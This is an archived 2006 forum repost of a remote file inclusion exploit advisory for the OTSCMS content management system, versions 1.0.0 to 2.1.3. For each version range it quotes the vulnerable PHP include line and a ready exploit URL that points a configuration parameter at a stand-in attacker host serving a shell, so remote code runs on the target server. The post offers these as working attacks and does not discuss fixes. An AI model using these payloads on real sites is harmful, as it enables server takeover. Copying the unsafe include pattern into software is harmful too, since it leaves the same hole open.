邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-10-24 11:51

OTSCMS <= 2.1.3 Multiple Remote File Include Vulnerabilities

[code]
**********************************************************************************************************
                          *                *
                * Coding 4 Fun (c4f.pl) *
                *                *
                *************************

* OTSCMS <= 2.1.3 by Wrzasq ([url]www.otscms.com[/url]) ;

* Class = Remote File Inclusion ;

* Download = [url]http://sourceforge.net/project/showfiles.php?group_id=145557[/url] ;

* Found by = GregStar (gregstar{at}c4f{dot}pl) ;

-------------------------------------------------------------------------------------------------------------------

OTSCMS 2.0.0 - 2.1.3 :

- Vulnerable Code:

require_once($GLOBALS[&#39;config&#39;][&#39;directories&#39;][&#39;classes&#39;] . $class . &#39;.php&#39;);

- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][directories][classes]=http://evilsite.com/shell?

-------------------------------------------------------------------------------------------------------------------

OTSCMS 1.3.0 - 1.4.1 :

- Vulnerable Code:

require_once($GLOBALS[&#39;config&#39;][&#39;otscms&#39;][&#39;directories&#39;][&#39;classes&#39;] . $class . &#39;.php&#39;);


- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][classes]=http://evilsite.com/shell?

-------------------------------------------------------------------------------------------------------------------

OTSCMS 1.0.0 - 1.0.3 :

- Vulnerable Code:

require_once($GLOBALS[&#39;config&#39;][&#39;otscms&#39;][&#39;directories&#39;][&#39;includes&#39;].&#39;OTSCMSException.class.php&#39;);

- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][includes]=http://evilsite.com/shell?

------------------------------------------------------------------------------------------------------------------

Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,RFL,d3m0n,java,kw@ch and for all friends.
**************************************************************************************************************

Notes:
Only works with php5 and 2.1.4 should also be vulnerable using OTSCMS.php with the config variable.
/str0ke

[/code]

页: [1]
© 1999-2008 EvilOctal Security Team